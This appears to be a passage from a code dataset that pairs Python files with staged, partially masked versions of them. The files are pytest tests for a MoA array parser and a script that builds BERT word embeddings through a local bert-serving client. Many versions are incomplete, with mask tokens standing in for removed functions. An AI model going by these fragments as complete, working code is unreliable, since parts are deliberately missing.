identifier='B'), NDArray(shape=(9,), data=None, constant=False,
identifier='ASDF')], statements=[], identifier='A_2_3_a'))])
def test_parse_function(expression, result):
parser = build_parser(start='function')
assert parser.parse(expression) == result
<|reserved_special_token_1|>
import pytest
from moa.primitives import NDArray, UnaryOperation, BinaryOperation, Function
from moa.yaccer import build_parser
@pytest.mark.parametrize("expression,result", [
("< 1 2 3>", NDArray(shape=(3,), data=[1, 2, 3], constant=False)),
])
def test_parse_vector(expression, result):
parser = build_parser(start='vector')
assert parser.parse(expression) == result
@pytest.mark.parametrize("expression, result", [
("const array A^3 <4 3 5>", NDArray(
shape=(4, 3, 5), data=None, constant=True, identifier='A')),
])
def test_parse_constant_arrays(expression, result):
parser = build_parser(start='constant_array')
assert parser.parse(expression) == result
@pytest.mark.parametrize("expression, result", [
("array Zasdf_asdf^1 <3>", NDArray(
shape=(3,), data=None, constant=False, identifier='Zasdf_asdf')),
])
def test_parse_arrays(expression, result):
parser = build_parser(start='array')
assert parser.parse(expression) == result
@pytest.mark.parametrize("expression, result", [
("j psi x", BinaryOperation(
operator='PSI',
left=NDArray(shape=None, data=None, constant=False, identifier='j'),
right=NDArray(shape=None, data=None, constant=False, identifier='x'))),
("A omega <1 2>", BinaryOperation(
operator='OMEGA',
left=NDArray(shape=None, data=None, constant=False, identifier='A'),
right=NDArray(shape=(2,), data=[1, 2], constant=False, identifier=None))),
("A omega B cat C", BinaryOperation(
operator='CAT',
left=BinaryOperation(
operator='OMEGA',
left=NDArray(shape=None, data=None, constant=False, identifier='A'),
right=NDArray(shape=None, data=None, constant=False, identifier='B')),
right=NDArray(shape=None, data=None, constant=False, identifier='C'))),
("(A omega B) cat C", BinaryOperation(
operator='CAT',
left=BinaryOperation(
operator='OMEGA',
left=NDArray(shape=None, data=None, constant=False, identifier='A'),
right=NDArray(shape=None, data=None, constant=False, identifier='B')),
right=NDArray(shape=None, data=None, constant=False, identifier='C'))),
("dim A cat B", BinaryOperation(
operator='CAT',
left=UnaryOperation(
operator='DIM',
right=NDArray(shape=None, data=None, constant=False, identifier='A')),
right=NDArray(shape=None, data=None, constant=False, identifier='B'))),
("dim (A cat B)", UnaryOperation(
operator='DIM',
right=BinaryOperation(
operator='CAT',
left=NDArray(shape=None, data=None, constant=False, identifier='A'),
right=NDArray(shape=None, data=None, constant=False, identifier='B')))),
])
def test_parse_terms_and_operators(expression, result):
parser = build_parser(start='term')
assert parser.parse(expression) == result
@pytest.mark.parametrize("expression, result", [
('main(){}', Function(arguments=[], statements=[], identifier='main')),
('foo_bar(array A^1 <5>){}', Function(
arguments=[NDArray(shape=(5,), data=None, constant=False, identifier='A')],
statements=[],
identifier='foo_bar')),
('BizBAZZ(array A^2 < 3 5>, array B^3 <6 5 8>){}', Function(
arguments=[
NDArray(shape=(3, 5), data=None, constant=False, identifier='A'),
NDArray(shape=(6, 5, 8), data=None, constant=False, identifier='B')],
statements=[],
identifier='BizBAZZ')),
('A_2_3_a(array A^2 <9 1>, array B^2 <3 1>, array ASDF^1 <9>){}', Function(
arguments=[
NDArray(shape=(9, 1), data=None, constant=False, identifier='A'),
NDArray(shape=(3, 1), data=None, constant=False, identifier='B'),
NDArray(shape=(9,), data=None, constant=False, identifier='ASDF')],
statements=[],
identifier='A_2_3_a')),
])
def test_parse_function(expression, result):
parser = build_parser(start='function')
assert parser.parse(expression) == result
|
flexible
|
{
"blob_id": "a8b5cf45e5f75ae4b493f5fc9bb4555319f1a725",
"index": 5294,
"step-1": "<mask token>\n\n\n@pytest.mark.parametrize('expression,result', [('< 1 2 3>', NDArray(shape=(\n 3,), data=[1, 2, 3], constant=False))])\ndef test_parse_vector(expression, result):\n parser = build_parser(start='vector')\n assert parser.parse(expression) == result\n\n\n<mask token>\n\n\n@pytest.mark.parametrize('expression, result', [('j psi x', BinaryOperation\n (operator='PSI', left=NDArray(shape=None, data=None, constant=False,\n identifier='j'), right=NDArray(shape=None, data=None, constant=False,\n identifier='x'))), ('A omega <1 2>', BinaryOperation(operator='OMEGA',\n left=NDArray(shape=None, data=None, constant=False, identifier='A'),\n right=NDArray(shape=(2,), data=[1, 2], constant=False, identifier=None)\n )), ('A omega B cat C', BinaryOperation(operator='CAT', left=\n BinaryOperation(operator='OMEGA', left=NDArray(shape=None, data=None,\n constant=False, identifier='A'), right=NDArray(shape=None, data=None,\n constant=False, identifier='B')), right=NDArray(shape=None, data=None,\n constant=False, identifier='C'))), ('(A omega B) cat C',\n BinaryOperation(operator='CAT', left=BinaryOperation(operator='OMEGA',\n left=NDArray(shape=None, data=None, constant=False, identifier='A'),\n right=NDArray(shape=None, data=None, constant=False, identifier='B')),\n right=NDArray(shape=None, data=None, constant=False, identifier='C'))),\n ('dim A cat B', BinaryOperation(operator='CAT', left=UnaryOperation(\n operator='DIM', right=NDArray(shape=None, data=None, constant=False,\n identifier='A')), right=NDArray(shape=None, data=None, constant=False,\n identifier='B'))), ('dim (A cat B)', UnaryOperation(operator='DIM',\n right=BinaryOperation(operator='CAT', left=NDArray(shape=None, data=\n None, constant=False, identifier='A'), right=NDArray(shape=None, data=\n None, constant=False, identifier='B'))))])\ndef test_parse_terms_and_operators(expression, result):\n parser = build_parser(start='term')\n assert parser.parse(expression) == result\n\n\n@pytest.mark.parametrize('expression, result', [('main(){}', Function(\n arguments=[], statements=[], identifier='main')), (\n 'foo_bar(array A^1 <5>){}', Function(arguments=[NDArray(shape=(5,),\n data=None, constant=False, identifier='A')], statements=[], identifier=\n 'foo_bar')), ('BizBAZZ(array A^2 < 3 5>, array B^3 <6 5 8>){}',\n Function(arguments=[NDArray(shape=(3, 5), data=None, constant=False,\n identifier='A'), NDArray(shape=(6, 5, 8), data=None, constant=False,\n identifier='B')], statements=[], identifier='BizBAZZ')), (\n 'A_2_3_a(array A^2 <9 1>, array B^2 <3 1>, array ASDF^1 <9>){}',\n Function(arguments=[NDArray(shape=(9, 1), data=None, constant=False,\n identifier='A'), NDArray(shape=(3, 1), data=None, constant=False,\n identifier='B'), NDArray(shape=(9,), data=None, constant=False,\n identifier='ASDF')], statements=[], identifier='A_2_3_a'))])\ndef test_parse_function(expression, result):\n parser = build_parser(start='function')\n assert parser.parse(expression) == result\n",
"step-2": "<mask token>\n\n\n@pytest.mark.parametrize('expression,result', [('< 1 2 3>', NDArray(shape=(\n 3,), data=[1, 2, 3], constant=False))])\ndef test_parse_vector(expression, result):\n parser = build_parser(start='vector')\n assert parser.parse(expression) == result\n\n\n@pytest.mark.parametrize('expression, result', [('const array A^3 <4 3 5>',\n NDArray(shape=(4, 3, 5), data=None, constant=True, identifier='A'))])\ndef test_parse_constant_arrays(expression, result):\n parser = build_parser(start='constant_array')\n assert parser.parse(expression) == result\n\n\n<mask token>\n\n\n@pytest.mark.parametrize('expression, result', [('j psi x', BinaryOperation\n (operator='PSI', left=NDArray(shape=None, data=None, constant=False,\n identifier='j'), right=NDArray(shape=None, data=None, constant=False,\n identifier='x'))), ('A omega <1 2>', BinaryOperation(operator='OMEGA',\n left=NDArray(shape=None, data=None, constant=False, identifier='A'),\n right=NDArray(shape=(2,), data=[1, 2], constant=False, identifier=None)\n )), ('A omega B cat C', BinaryOperation(operator='CAT', left=\n BinaryOperation(operator='OMEGA', left=NDArray(shape=None, data=None,\n constant=False, identifier='A'), right=NDArray(shape=None, data=None,\n constant=False, identifier='B')), right=NDArray(shape=None, data=None,\n constant=False, identifier='C'))), ('(A omega B) cat C',\n BinaryOperation(operator='CAT', left=BinaryOperation(operator='OMEGA',\n left=NDArray(shape=None, data=None, constant=False, identifier='A'),\n right=NDArray(shape=None, data=None, constant=False, identifier='B')),\n right=NDArray(shape=None, data=None, constant=False, identifier='C'))),\n ('dim A cat B', BinaryOperation(operator='CAT', left=UnaryOperation(\n operator='DIM', right=NDArray(shape=None, data=None, constant=False,\n identifier='A')), right=NDArray(shape=None, data=None, constant=False,\n identifier='B'))), ('dim (A cat B)', UnaryOperation(operator='DIM',\n right=BinaryOperation(operator='CAT', left=NDArray(shape=None, data=\n None, constant=False, identifier='A'), right=NDArray(shape=None, data=\n None, constant=False, identifier='B'))))])\ndef test_parse_terms_and_operators(expression, result):\n parser = build_parser(start='term')\n assert parser.parse(expression) == result\n\n\n@pytest.mark.parametrize('expression, result', [('main(){}', Function(\n arguments=[], statements=[], identifier='main')), (\n 'foo_bar(array A^1 <5>){}', Function(arguments=[NDArray(shape=(5,),\n data=None, constant=False, identifier='A')], statements=[], identifier=\n 'foo_bar')), ('BizBAZZ(array A^2 < 3 5>, array B^3 <6 5 8>){}',\n Function(arguments=[NDArray(shape=(3, 5), data=None, constant=False,\n identifier='A'), NDArray(shape=(6, 5, 8), data=None, constant=False,\n identifier='B')], statements=[], identifier='BizBAZZ')), (\n 'A_2_3_a(array A^2 <9 1>, array B^2 <3 1>, array ASDF^1 <9>){}',\n Function(arguments=[NDArray(shape=(9, 1), data=None, constant=False,\n identifier='A'), NDArray(shape=(3, 1), data=None, constant=False,\n identifier='B'), NDArray(shape=(9,), data=None, constant=False,\n identifier='ASDF')], statements=[], identifier='A_2_3_a'))])\ndef test_parse_function(expression, result):\n parser = build_parser(start='function')\n assert parser.parse(expression) == result\n",
"step-3": "<mask token>\n\n\n@pytest.mark.parametrize('expression,result', [('< 1 2 3>', NDArray(shape=(\n 3,), data=[1, 2, 3], constant=False))])\ndef test_parse_vector(expression, result):\n parser = build_parser(start='vector')\n assert parser.parse(expression) == result\n\n\n@pytest.mark.parametrize('expression, result', [('const array A^3 <4 3 5>',\n NDArray(shape=(4, 3, 5), data=None, constant=True, identifier='A'))])\ndef test_parse_constant_arrays(expression, result):\n parser = build_parser(start='constant_array')\n assert parser.parse(expression) == result\n\n\n@pytest.mark.parametrize('expression, result', [('array Zasdf_asdf^1 <3>',\n NDArray(shape=(3,), data=None, constant=False, identifier='Zasdf_asdf'))])\ndef test_parse_arrays(expression, result):\n parser = build_parser(start='array')\n assert parser.parse(expression) == result\n\n\n@pytest.mark.parametrize('expression, result', [('j psi x', BinaryOperation\n (operator='PSI', left=NDArray(shape=None, data=None, constant=False,\n identifier='j'), right=NDArray(shape=None, data=None, constant=False,\n identifier='x'))), ('A omega <1 2>', BinaryOperation(operator='OMEGA',\n left=NDArray(shape=None, data=None, constant=False, identifier='A'),\n right=NDArray(shape=(2,), data=[1, 2], constant=False, identifier=None)\n )), ('A omega B cat C', BinaryOperation(operator='CAT', left=\n BinaryOperation(operator='OMEGA', left=NDArray(shape=None, data=None,\n constant=False, identifier='A'), right=NDArray(shape=None, data=None,\n constant=False, identifier='B')), right=NDArray(shape=None, data=None,\n constant=False, identifier='C'))), ('(A omega B) cat C',\n BinaryOperation(operator='CAT', left=BinaryOperation(operator='OMEGA',\n left=NDArray(shape=None, data=None, constant=False, identifier='A'),\n right=NDArray(shape=None, data=None, constant=False, identifier='B')),\n right=NDArray(shape=None, data=None, constant=False, identifier='C'))),\n ('dim A cat B', BinaryOperation(operator='CAT', left=UnaryOperation(\n operator='DIM', right=NDArray(shape=None, data=None, constant=False,\n identifier='A')), right=NDArray(shape=None, data=None, constant=False,\n identifier='B'))), ('dim (A cat B)', UnaryOperation(operator='DIM',\n right=BinaryOperation(operator='CAT', left=NDArray(shape=None, data=\n None, constant=False, identifier='A'), right=NDArray(shape=None, data=\n None, constant=False, identifier='B'))))])\ndef test_parse_terms_and_operators(expression, result):\n parser = build_parser(start='term')\n assert parser.parse(expression) == result\n\n\n@pytest.mark.parametrize('expression, result', [('main(){}', Function(\n arguments=[], statements=[], identifier='main')), (\n 'foo_bar(array A^1 <5>){}', Function(arguments=[NDArray(shape=(5,),\n data=None, constant=False, identifier='A')], statements=[], identifier=\n 'foo_bar')), ('BizBAZZ(array A^2 < 3 5>, array B^3 <6 5 8>){}',\n Function(arguments=[NDArray(shape=(3, 5), data=None, constant=False,\n identifier='A'), NDArray(shape=(6, 5, 8), data=None, constant=False,\n identifier='B')], statements=[], identifier='BizBAZZ')), (\n 'A_2_3_a(array A^2 <9 1>, array B^2 <3 1>, array ASDF^1 <9>){}',\n Function(arguments=[NDArray(shape=(9, 1), data=None, constant=False,\n identifier='A'), NDArray(shape=(3, 1), data=None, constant=False,\n identifier='B'), NDArray(shape=(9,), data=None, constant=False,\n identifier='ASDF')], statements=[], identifier='A_2_3_a'))])\ndef test_parse_function(expression, result):\n parser = build_parser(start='function')\n assert parser.parse(expression) == result\n",
"step-4": "import pytest\nfrom moa.primitives import NDArray, UnaryOperation, BinaryOperation, Function\nfrom moa.yaccer import build_parser\n\n\n@pytest.mark.parametrize('expression,result', [('< 1 2 3>', NDArray(shape=(\n 3,), data=[1, 2, 3], constant=False))])\ndef test_parse_vector(expression, result):\n parser = build_parser(start='vector')\n assert parser.parse(expression) == result\n\n\n@pytest.mark.parametrize('expression, result', [('const array A^3 <4 3 5>',\n NDArray(shape=(4, 3, 5), data=None, constant=True, identifier='A'))])\ndef test_parse_constant_arrays(expression, result):\n parser = build_parser(start='constant_array')\n assert parser.parse(expression) == result\n\n\n@pytest.mark.parametrize('expression, result', [('array Zasdf_asdf^1 <3>',\n NDArray(shape=(3,), data=None, constant=False, identifier='Zasdf_asdf'))])\ndef test_parse_arrays(expression, result):\n parser = build_parser(start='array')\n assert parser.parse(expression) == result\n\n\n@pytest.mark.parametrize('expression, result', [('j psi x', BinaryOperation\n (operator='PSI', left=NDArray(shape=None, data=None, constant=False,\n identifier='j'), right=NDArray(shape=None, data=None, constant=False,\n identifier='x'))), ('A omega <1 2>', BinaryOperation(operator='OMEGA',\n left=NDArray(shape=None, data=None, constant=False, identifier='A'),\n right=NDArray(shape=(2,), data=[1, 2], constant=False, identifier=None)\n )), ('A omega B cat C', BinaryOperation(operator='CAT', left=\n BinaryOperation(operator='OMEGA', left=NDArray(shape=None, data=None,\n constant=False, identifier='A'), right=NDArray(shape=None, data=None,\n constant=False, identifier='B')), right=NDArray(shape=None, data=None,\n constant=False, identifier='C'))), ('(A omega B) cat C',\n BinaryOperation(operator='CAT', left=BinaryOperation(operator='OMEGA',\n left=NDArray(shape=None, data=None, constant=False, identifier='A'),\n right=NDArray(shape=None, data=None, constant=False, identifier='B')),\n right=NDArray(shape=None, data=None, constant=False, identifier='C'))),\n ('dim A cat B', BinaryOperation(operator='CAT', left=UnaryOperation(\n operator='DIM', right=NDArray(shape=None, data=None, constant=False,\n identifier='A')), right=NDArray(shape=None, data=None, constant=False,\n identifier='B'))), ('dim (A cat B)', UnaryOperation(operator='DIM',\n right=BinaryOperation(operator='CAT', left=NDArray(shape=None, data=\n None, constant=False, identifier='A'), right=NDArray(shape=None, data=\n None, constant=False, identifier='B'))))])\ndef test_parse_terms_and_operators(expression, result):\n parser = build_parser(start='term')\n assert parser.parse(expression) == result\n\n\n@pytest.mark.parametrize('expression, result', [('main(){}', Function(\n arguments=[], statements=[], identifier='main')), (\n 'foo_bar(array A^1 <5>){}', Function(arguments=[NDArray(shape=(5,),\n data=None, constant=False, identifier='A')], statements=[], identifier=\n 'foo_bar')), ('BizBAZZ(array A^2 < 3 5>, array B^3 <6 5 8>){}',\n Function(arguments=[NDArray(shape=(3, 5), data=None, constant=False,\n identifier='A'), NDArray(shape=(6, 5, 8), data=None, constant=False,\n identifier='B')], statements=[], identifier='BizBAZZ')), (\n 'A_2_3_a(array A^2 <9 1>, array B^2 <3 1>, array ASDF^1 <9>){}',\n Function(arguments=[NDArray(shape=(9, 1), data=None, constant=False,\n identifier='A'), NDArray(shape=(3, 1), data=None, constant=False,\n identifier='B'), NDArray(shape=(9,), data=None, constant=False,\n identifier='ASDF')], statements=[], identifier='A_2_3_a'))])\ndef test_parse_function(expression, result):\n parser = build_parser(start='function')\n assert parser.parse(expression) == result\n",
"step-5": "import pytest\n\nfrom moa.primitives import NDArray, UnaryOperation, BinaryOperation, Function\nfrom moa.yaccer import build_parser\n\n\n@pytest.mark.parametrize(\"expression,result\", [\n (\"< 1 2 3>\", NDArray(shape=(3,), data=[1, 2, 3], constant=False)),\n])\ndef test_parse_vector(expression, result):\n parser = build_parser(start='vector')\n assert parser.parse(expression) == result\n\n\n@pytest.mark.parametrize(\"expression, result\", [\n (\"const array A^3 <4 3 5>\", NDArray(\n shape=(4, 3, 5), data=None, constant=True, identifier='A')),\n])\ndef test_parse_constant_arrays(expression, result):\n parser = build_parser(start='constant_array')\n assert parser.parse(expression) == result\n\n\n@pytest.mark.parametrize(\"expression, result\", [\n (\"array Zasdf_asdf^1 <3>\", NDArray(\n shape=(3,), data=None, constant=False, identifier='Zasdf_asdf')),\n])\ndef test_parse_arrays(expression, result):\n parser = build_parser(start='array')\n assert parser.parse(expression) == result\n\n\n@pytest.mark.parametrize(\"expression, result\", [\n (\"j psi x\", BinaryOperation(\n operator='PSI',\n left=NDArray(shape=None, data=None, constant=False, identifier='j'),\n right=NDArray(shape=None, data=None, constant=False, identifier='x'))),\n (\"A omega <1 2>\", BinaryOperation(\n operator='OMEGA',\n left=NDArray(shape=None, data=None, constant=False, identifier='A'),\n right=NDArray(shape=(2,), data=[1, 2], constant=False, identifier=None))),\n (\"A omega B cat C\", BinaryOperation(\n operator='CAT',\n left=BinaryOperation(\n operator='OMEGA',\n left=NDArray(shape=None, data=None, constant=False, identifier='A'),\n right=NDArray(shape=None, data=None, constant=False, identifier='B')),\n right=NDArray(shape=None, data=None, constant=False, identifier='C'))),\n (\"(A omega B) cat C\", BinaryOperation(\n operator='CAT',\n left=BinaryOperation(\n operator='OMEGA',\n left=NDArray(shape=None, data=None, constant=False, identifier='A'),\n right=NDArray(shape=None, data=None, constant=False, identifier='B')),\n right=NDArray(shape=None, data=None, constant=False, identifier='C'))),\n (\"dim A cat B\", BinaryOperation(\n operator='CAT',\n left=UnaryOperation(\n operator='DIM',\n right=NDArray(shape=None, data=None, constant=False, identifier='A')),\n right=NDArray(shape=None, data=None, constant=False, identifier='B'))),\n (\"dim (A cat B)\", UnaryOperation(\n operator='DIM',\n right=BinaryOperation(\n operator='CAT',\n left=NDArray(shape=None, data=None, constant=False, identifier='A'),\n right=NDArray(shape=None, data=None, constant=False, identifier='B')))),\n])\ndef test_parse_terms_and_operators(expression, result):\n parser = build_parser(start='term')\n assert parser.parse(expression) == result\n\n\n@pytest.mark.parametrize(\"expression, result\", [\n ('main(){}', Function(arguments=[], statements=[], identifier='main')),\n ('foo_bar(array A^1 <5>){}', Function(\n arguments=[NDArray(shape=(5,), data=None, constant=False, identifier='A')],\n statements=[],\n identifier='foo_bar')),\n ('BizBAZZ(array A^2 < 3 5>, array B^3 <6 5 8>){}', Function(\n arguments=[\n NDArray(shape=(3, 5), data=None, constant=False, identifier='A'),\n NDArray(shape=(6, 5, 8), data=None, constant=False, identifier='B')],\n statements=[],\n identifier='BizBAZZ')),\n ('A_2_3_a(array A^2 <9 1>, array B^2 <3 1>, array ASDF^1 <9>){}', Function(\n arguments=[\n NDArray(shape=(9, 1), data=None, constant=False, identifier='A'),\n NDArray(shape=(3, 1), data=None, constant=False, identifier='B'),\n NDArray(shape=(9,), data=None, constant=False, identifier='ASDF')],\n statements=[],\n identifier='A_2_3_a')),\n])\ndef test_parse_function(expression, result):\n parser = build_parser(start='function')\n assert parser.parse(expression) == result\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
def embed_last_token(text):
result = bc.encode(text, show_tokens=True)
batch = []
for sent, tensor, tokens in zip(text, result[0], result[1]):
valid = []
tid = 0
buffer = ''
words = sent.lower().split()
for i, t in enumerate(tokens):
if t == '[CLS]' or t == '[SEP]':
continue
else:
if t.startswith('##'):
t = t[2:]
elif t == '[UNK]':
t = words[tid][len(buffer)]
buffer += t
if buffer == words[tid]:
valid.append(i)
buffer = ''
tid += 1
if len(valid) != len(sent.split()) or tid != len(words):
print(valid)
print(sent.split())
print(result[1])
batch.append(tensor[valid, :])
return batch
def embed_sum(text):
result = bc.encode(text, show_tokens=True)
batch = []
for sent, tensor, tokens in zip(text, result[0], result[1]):
token_tensor = []
sent_tensor = []
tid = 0
buffer = ''
words = sent.lower().split()
for i, t in enumerate(tokens):
if t == '[CLS]' or t == '[SEP]':
continue
else:
if t.startswith('##'):
t = t[2:]
elif t == '[UNK]':
t = words[tid][len(buffer)]
buffer += t
token_tensor.append(tensor[i, :])
if buffer == words[tid]:
sent_tensor.append(np.stack(token_tensor).mean(axis=0))
token_tensor = []
buffer = ''
tid += 1
if tid != len(words) or len(sent_tensor) != len(words):
print(sent.split())
print(tokens)
exit()
batch.append(np.stack(sent_tensor))
return batch
def generate_bert(path, output, embed_fun=embed_sum):
print(output)
total = 0
with open(path) as src:
batch = []
tensor = []
for line in src:
line = line.strip()
if len(line) == 0:
continue
batch.append(CharTable.convert(line).replace('—', '-').replace(
'‘', "'").replace('…', '.').replace('坜', '壢').replace('唛',
'麦').replace('ㄅㄆㄇㄈ', '呀呀').replace('’', "'"))
if len(batch) and len(batch) % 100 == 0:
tensor.extend(embed_fun(batch))
total += len(batch)
print(total)
batch = []
if len(batch):
tensor.extend(embed_fun(batch))
total += len(batch)
print(total)
with open(output, 'wb') as f:
pickle.dump(tensor, f)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def embed_last_token(text):
result = bc.encode(text, show_tokens=True)
batch = []
for sent, tensor, tokens in zip(text, result[0], result[1]):
valid = []
tid = 0
buffer = ''
words = sent.lower().split()
for i, t in enumerate(tokens):
if t == '[CLS]' or t == '[SEP]':
continue
else:
if t.startswith('##'):
t = t[2:]
elif t == '[UNK]':
t = words[tid][len(buffer)]
buffer += t
if buffer == words[tid]:
valid.append(i)
buffer = ''
tid += 1
if len(valid) != len(sent.split()) or tid != len(words):
print(valid)
print(sent.split())
print(result[1])
batch.append(tensor[valid, :])
return batch
def embed_sum(text):
result = bc.encode(text, show_tokens=True)
batch = []
for sent, tensor, tokens in zip(text, result[0], result[1]):
token_tensor = []
sent_tensor = []
tid = 0
buffer = ''
words = sent.lower().split()
for i, t in enumerate(tokens):
if t == '[CLS]' or t == '[SEP]':
continue
else:
if t.startswith('##'):
t = t[2:]
elif t == '[UNK]':
t = words[tid][len(buffer)]
buffer += t
token_tensor.append(tensor[i, :])
if buffer == words[tid]:
sent_tensor.append(np.stack(token_tensor).mean(axis=0))
token_tensor = []
buffer = ''
tid += 1
if tid != len(words) or len(sent_tensor) != len(words):
print(sent.split())
print(tokens)
exit()
batch.append(np.stack(sent_tensor))
return batch
def generate_bert(path, output, embed_fun=embed_sum):
print(output)
total = 0
with open(path) as src:
batch = []
tensor = []
for line in src:
line = line.strip()
if len(line) == 0:
continue
batch.append(CharTable.convert(line).replace('—', '-').replace(
'‘', "'").replace('…', '.').replace('坜', '壢').replace('唛',
'麦').replace('ㄅㄆㄇㄈ', '呀呀').replace('’', "'"))
if len(batch) and len(batch) % 100 == 0:
tensor.extend(embed_fun(batch))
total += len(batch)
print(total)
batch = []
if len(batch):
tensor.extend(embed_fun(batch))
total += len(batch)
print(total)
with open(output, 'wb') as f:
pickle.dump(tensor, f)
if __name__ == '__main__':
generate_bert('data/semeval15/cz.pas.dev.sent.txt',
'data/embedding/bert_base_sum/cz.pas.dev.bert', embed_fun=embed_sum)
generate_bert('data/semeval15/cz.pas.train.sent.txt',
'data/embedding/bert_base_sum/cz.pas.train.bert', embed_fun=embed_sum)
generate_bert('data/semeval15/cz.id.pas.sent.txt',
'data/embedding/bert_base_sum/cz.id.pas.bert', embed_fun=embed_sum)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
CharTable = JClass('com.hankcs.hanlp.dictionary.other.CharTable')
bc = BertClient(ip='127.0.0.1')
def embed_last_token(text):
result = bc.encode(text, show_tokens=True)
batch = []
for sent, tensor, tokens in zip(text, result[0], result[1]):
valid = []
tid = 0
buffer = ''
words = sent.lower().split()
for i, t in enumerate(tokens):
if t == '[CLS]' or t == '[SEP]':
continue
else:
if t.startswith('##'):
t = t[2:]
elif t == '[UNK]':
t = words[tid][len(buffer)]
buffer += t
if buffer == words[tid]:
valid.append(i)
buffer = ''
tid += 1
if len(valid) != len(sent.split()) or tid != len(words):
print(valid)
print(sent.split())
print(result[1])
batch.append(tensor[valid, :])
return batch
def embed_sum(text):
result = bc.encode(text, show_tokens=True)
batch = []
for sent, tensor, tokens in zip(text, result[0], result[1]):
token_tensor = []
sent_tensor = []
tid = 0
buffer = ''
words = sent.lower().split()
for i, t in enumerate(tokens):
if t == '[CLS]' or t == '[SEP]':
continue
else:
if t.startswith('##'):
t = t[2:]
elif t == '[UNK]':
t = words[tid][len(buffer)]
buffer += t
token_tensor.append(tensor[i, :])
if buffer == words[tid]:
sent_tensor.append(np.stack(token_tensor).mean(axis=0))
token_tensor = []
buffer = ''
tid += 1
if tid != len(words) or len(sent_tensor) != len(words):
print(sent.split())
print(tokens)
exit()
batch.append(np.stack(sent_tensor))
return batch
def generate_bert(path, output, embed_fun=embed_sum):
print(output)
total = 0
with open(path) as src:
batch = []
tensor = []
for line in src:
line = line.strip()
if len(line) == 0:
continue
batch.append(CharTable.convert(line).replace('—', '-').replace(
'‘', "'").replace('…', '.').replace('坜', '壢').replace('唛',
'麦').replace('ㄅㄆㄇㄈ', '呀呀').replace('’', "'"))
if len(batch) and len(batch) % 100 == 0:
tensor.extend(embed_fun(batch))
total += len(batch)
print(total)
batch = []
if len(batch):
tensor.extend(embed_fun(batch))
total += len(batch)
print(total)
with open(output, 'wb') as f:
pickle.dump(tensor, f)
if __name__ == '__main__':
generate_bert('data/semeval15/cz.pas.dev.sent.txt',
'data/embedding/bert_base_sum/cz.pas.dev.bert', embed_fun=embed_sum)
generate_bert('data/semeval15/cz.pas.train.sent.txt',
'data/embedding/bert_base_sum/cz.pas.train.bert', embed_fun=embed_sum)
generate_bert('data/semeval15/cz.id.pas.sent.txt',
'data/embedding/bert_base_sum/cz.id.pas.bert', embed_fun=embed_sum)
<|reserved_special_token_1|>
import pickle
import numpy as np
from bert_serving.client import BertClient
from pyhanlp import *
CharTable = JClass('com.hankcs.hanlp.dictionary.other.CharTable')
bc = BertClient(ip='127.0.0.1')
def embed_last_token(text):
result = bc.encode(text, show_tokens=True)
batch = []
for sent, tensor, tokens in zip(text, result[0], result[1]):
valid = []
tid = 0
buffer = ''
words = sent.lower().split()
for i, t in enumerate(tokens):
if t == '[CLS]' or t == '[SEP]':
continue
else:
if t.startswith('##'):
t = t[2:]
elif t == '[UNK]':
t = words[tid][len(buffer)]
buffer += t
if buffer == words[tid]:
valid.append(i)
buffer = ''
tid += 1
if len(valid) != len(sent.split()) or tid != len(words):
print(valid)
print(sent.split())
print(result[1])
batch.append(tensor[valid, :])
return batch
def embed_sum(text):
result = bc.encode(text, show_tokens=True)
batch = []
for sent, tensor, tokens in zip(text, result[0], result[1]):
token_tensor = []
sent_tensor = []
tid = 0
buffer = ''
words = sent.lower().split()
for i, t in enumerate(tokens):
if t == '[CLS]' or t == '[SEP]':
continue
else:
if t.startswith('##'):
t = t[2:]
elif t == '[UNK]':
t = words[tid][len(buffer)]
buffer += t
token_tensor.append(tensor[i, :])
if buffer == words[tid]:
sent_tensor.append(np.stack(token_tensor).mean(axis=0))
token_tensor = []
buffer = ''
tid += 1
if tid != len(words) or len(sent_tensor) != len(words):
print(sent.split())
print(tokens)
exit()
batch.append(np.stack(sent_tensor))
return batch
def generate_bert(path, output, embed_fun=embed_sum):
print(output)
total = 0
with open(path) as src:
batch = []
tensor = []
for line in src:
line = line.strip()
if len(line) == 0:
continue
batch.append(CharTable.convert(line).replace('—', '-').replace(
'‘', "'").replace('…', '.').replace('坜', '壢').replace('唛',
'麦').replace('ㄅㄆㄇㄈ', '呀呀').replace('’', "'"))
if len(batch) and len(batch) % 100 == 0:
tensor.extend(embed_fun(batch))
total += len(batch)
print(total)
batch = []
if len(batch):
tensor.extend(embed_fun(batch))
total += len(batch)
print(total)
with open(output, 'wb') as f:
pickle.dump(tensor, f)
if __name__ == '__main__':
generate_bert('data/semeval15/cz.pas.dev.sent.txt',
'data/embedding/bert_base_sum/cz.pas.dev.bert', embed_fun=embed_sum)
generate_bert('data/semeval15/cz.pas.train.sent.txt',
'data/embedding/bert_base_sum/cz.pas.train.bert', embed_fun=embed_sum)
generate_bert('data/semeval15/cz.id.pas.sent.txt',
'data/embedding/bert_base_sum/cz.id.pas.bert', embed_fun=embed_sum)
<|reserved_special_token_1|>
# -*- coding:utf-8 -*-
# Author: hankcs
# Date: 2019-01-13 15:01
import pickle
import numpy as np
from bert_serving.client import BertClient
from pyhanlp import *
CharTable = JClass('com.hankcs.hanlp.dictionary.other.CharTable')
# bc = BertClient(ip='192.168.1.88') # ip address of the server
bc = BertClient(ip='127.0.0.1') # ip address of the GPU machine
def embed_last_token(text):
result = bc.encode(text, show_tokens=True)
# print(result)
batch = []
for sent, tensor, tokens in zip(text, result[0], result[1]):
valid = []
tid = 0
buffer = ''
words = sent.lower().split()
for i, t in enumerate(tokens):
if t == '[CLS]' or t == '[SEP]':
continue
else:
if t.startswith('##'):
t = t[2:]
elif t == '[UNK]':
t = words[tid][len(buffer)]
buffer += t
if buffer == words[tid]:
valid.append(i)
buffer = ''
tid += 1
# print(len(valid))
# exit()
if len(valid) != len(sent.split()) or tid != len(words):
print(valid)
print(sent.split())
print(result[1])
batch.append(tensor[valid, :])
return batch
def embed_sum(text):
result = bc.encode(text, show_tokens=True)
# print(result)
batch = []
for sent, tensor, tokens in zip(text, result[0], result[1]):
token_tensor = []
sent_tensor = []
tid = 0
buffer = ''
words = sent.lower().split()
for i, t in enumerate(tokens):
if t == '[CLS]' or t == '[SEP]':
continue
else:
if t.startswith('##'):
t = t[2:]
elif t == '[UNK]':
t = words[tid][len(buffer)]
buffer += t
token_tensor.append(tensor[i, :])
